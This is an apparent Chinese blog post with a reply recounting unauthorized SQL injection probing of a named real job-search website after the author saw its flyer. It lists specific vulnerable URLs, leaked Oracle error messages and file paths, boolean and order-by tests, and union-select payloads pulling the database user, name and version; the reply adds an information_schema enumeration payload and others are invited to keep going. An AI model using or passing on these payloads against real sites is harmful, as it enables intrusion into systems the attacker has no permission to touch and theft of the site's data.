查看文章 |
今日学校有http://my.51job.com 的传单,于是上了一下他的网站. 点投票,发现存在php注入 ORA-00933: SQL command not properly ended 加双引号还暴出路径 Warning: OCIParse: ORA-01740: missing double quote in identifier in /var/www/inc/co/news/news_oci8.class.php on line 69 可惜权限不太 只能像asp 的Access 注入一样猜表. 反回正常. 当然and exists(select * from log_action) log_action这个表是存在的.哈哈. 再看一下其它页面. http://my.51job.com/investigate/ShowInvestList.php?typelike=07' ORA-00933: SQL command not properly ended 原来到处都丰在漏洞...晕 ------------------------------------------------------------------------------------------------------------------- 新发现.漏洞还真多 页面下面的ad连接 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 正常转向 但 http://ac.51job.com/phpAD/adtrace.php?ID=10775340' 不能正常转向 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=1 正常 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 不正常 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 4 不正常 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 order by 3 正常 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select 1,2,3 返回 若 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select user(),2,3 http://companyadc.51job.com/jobs@localhost http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select database(),2,3 http://ac.51job.com/phpAD/adtrace.php?ID=10775340 and 1=2 union select version(),2,3 哈哈.... 如果谁还有兴趣猜下去的就继续............go
jackal 是MYSQL5的数据库,不用运气猜表的.
CODE:
http://ac.51job.com/phpAD/adtrace.php?ID=10775340%20and%201=2%20union%20select%20COLUMN_NAME,2,3%20from%20information_schema.STATISTICS where COLUMN_NAME not in (0x4A4F424944,0x5352564944,0x495353554544415445,0x4A4F4241524541,0x46554E435459504531,0x46554E435459504532,0x55504441544544415445,0x434F4944,0x43544D4944)/*
|
